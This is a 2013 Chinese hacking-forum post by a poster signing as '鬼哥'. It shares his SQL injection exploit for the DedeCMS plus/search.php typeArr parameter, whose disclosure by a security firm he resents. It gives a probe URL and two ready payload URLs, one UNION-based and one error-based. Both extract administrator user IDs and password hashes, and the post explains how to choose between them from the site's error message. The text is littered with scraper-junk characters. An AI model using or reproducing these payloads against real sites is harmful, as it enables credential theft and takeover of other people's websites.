转载不加作者名的没JJ
- N& ^. X- a2 U0 f
% d R8 f( \$ ?3 A哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。( F3 l/ {* Z: I% G: H
$ G8 K) J' E# @$ A j既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
, L2 e( R) K/ `( u* B" ]/ j4 i4 j$ S7 L8 ?4 G2 ?5 S2 l* i. J
我一般是这样测试的:
" O' R$ A- J9 N0 r
; W( ]2 W+ Z9 `' F# k9 i提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
' X' [/ ? P0 K3 ^ O
* z7 C( D* u5 C" A转载不加作者名的没JJ! E# o; E4 Y; Y& X
4 v0 d9 ]* x+ }$ g) O7 c- M作者:鬼哥
R' `0 b" I% e6 ^
$ f; G. `/ h# ^1 Y: V U: r y0 K, b/ N
/ S; x$ f* t: m: I4 f6 e! P7 P看结果如果提示
6 o0 ^" J y! z) K5 r- [; H& y
3 S7 |" E* f# o4 f3 ]7 ?' rSafe Alert: Request Error step 2 !
" C+ R- v u. G# E2 Z/ F
' E' F# A/ l" ^' A: ? |( i那么直接用下面的exp5 L( P" X- I. S6 D4 M: I9 T8 C: I9 s
; c( J l$ e) O3 Q: O( Y9 Y4 a
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
) `$ E5 E" y% I9 N' g: J* i( L' \% \- u' p. ]) M. J% p! @
4 ^% J, w' K6 @& q& u4 _看结果如果提示
/ G8 I% O+ s4 y( N9 p8 D- C" k/ V* ?1 M. E& G; a2 E* b+ z! L5 h
Safe Alert: Request Error step 1 !
4 N+ D8 e4 @8 e' K6 |: r1 B( c* X: }4 j% t
那么直接用下面的exp
0 H( ?( \5 _0 [8 f* H+ J
# u) w. u V; Zxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a1 D; f0 |2 r" t& Q" P! r: Q
7 S- c) K$ ? @2 ~, f' D% {
0 [. L' A5 g H% R* y* \0 I如果正常显示证明漏洞不存在了。% D q: Y6 y, [; y1 z
5 _6 R, D9 x; _# D$ k: e1 y
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对